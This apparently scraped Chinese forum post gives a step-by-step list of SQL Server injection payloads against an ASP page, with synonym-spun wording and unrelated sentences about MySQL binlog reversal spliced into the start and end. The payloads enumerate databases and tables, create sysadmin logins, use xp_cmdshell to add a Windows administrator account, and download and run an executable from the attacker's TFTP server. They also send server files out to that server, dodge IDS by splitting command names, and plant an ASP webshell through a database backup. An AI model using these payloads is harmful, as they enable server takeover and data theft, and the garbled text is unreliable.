|
|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
每个Rows_log_event中包含event_type,可选值为WRITE_ROWS_EVENT、UPDATE_ROWS_EVENT、DELETE_ROWS_EVENT。从宏名字就能看出用途。server|sqlserver|初级|技能如今将老兵自己多年的SQLSERVER注进初级技能贡献给撑持老兵的伴侣:
媒介:
便是初级技能,别的基础的注进办法就不胪陈了。
看不懂可查本站的注进基本文章。
为了更好的用好注进,倡议人人看看本站的SQL语法相干文章
[猎取全体数据库名]
selectnamefrommaster.dbo.sysdatabaseswheredbid=7//dbid的值为7以上都是用户数据库
[取得数据表名][将字段值更新为表名,再设法读出这个字段的值便可失掉表名]
selecttop1namefrom数据库名.dbo.sysobjectswherextype=uandstatus>0andnamenotin(table)
[取得数据表字段名][将字段值更新为字段名,再设法读出这个字段的值便可失掉字段名]
selecttop1数据库名.dbo.col_name(object_id(要查询的数据表名),字段列如:1)[where前提]
经由过程SQLSERVER注进毛病建数据库办理员帐号和体系办理员帐号[以后帐号必需是SYSADMIN组]
news.asp?id=2;execmaster.dbo.sp_addlogintest,test;--//增加数据库用户用户test,暗码为test
news.asp?id=2;execmaster.dbo.sp_passwordtest,123456,test;--//假如想改暗码,则用这句(将test的暗码改成123456)
news.asp?id=2;execmaster.dbo.sp_addsrvrolemembertest,sysadmin;--//将test加到sysadmin组,这个组的成员可实行任何操纵
news.asp?id=2;execmaster.dbo.xp_cmdshellnetusertesttest/add;--//增加体系用户test,暗码为test
news.asp?id=2;execmaster.dbo.xp_cmdshellnetlocalgroupadministratorstest/add;--//将体系用户test提拔为办理员
如许,你在他的数据库和体系内都留下了test办理员账号了
上面是怎样从你的服器下载文件file.exe后运转它[条件是你必需将你的电脑设为TFTP服务器,将69端口翻开]
id=2;execmaster.dbo.xp_cmdshelltftp–i你的IPgetfile.exe;--
然后运转这个文件:
id=2;execmaster.dbo.xp_cmdshellfile.exe;--
下载服务器的文件file2.doc到当地TFTP服务器[文件必需存在]:
id=2;execmaster.dbo.xp_cmdshelltftp–i你的IPPutfile2.doc;--
绕过IDS的检测[利用变量]
declare@asysnameset@a=xp_+cmdshellexec@adirc:
declare@asysnameset@a=xp+_cm+dshellexec@adirc:
新加的:
建一个表。只要一个字段,范例为image,将asp内容写进。导出数据库为文件
backupdatabasedbnametodisk=d:webdb.asp;
报错失掉体系操纵体系和数据库体系版本号
id=2and1(select@@VERSION);我们只需要把binlog文件反向执行,每个操作都执行逆操作即可。当然也不是所有的event都反转。Table_mapevent必须还是在Rows_log_event每个操作之前。 |
|
|Archiver|手机版|仓酷云
鄂ICP备14007578号-2
发表于 2015-1-16 22:40:04
收藏
转播
分享
淘帖
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜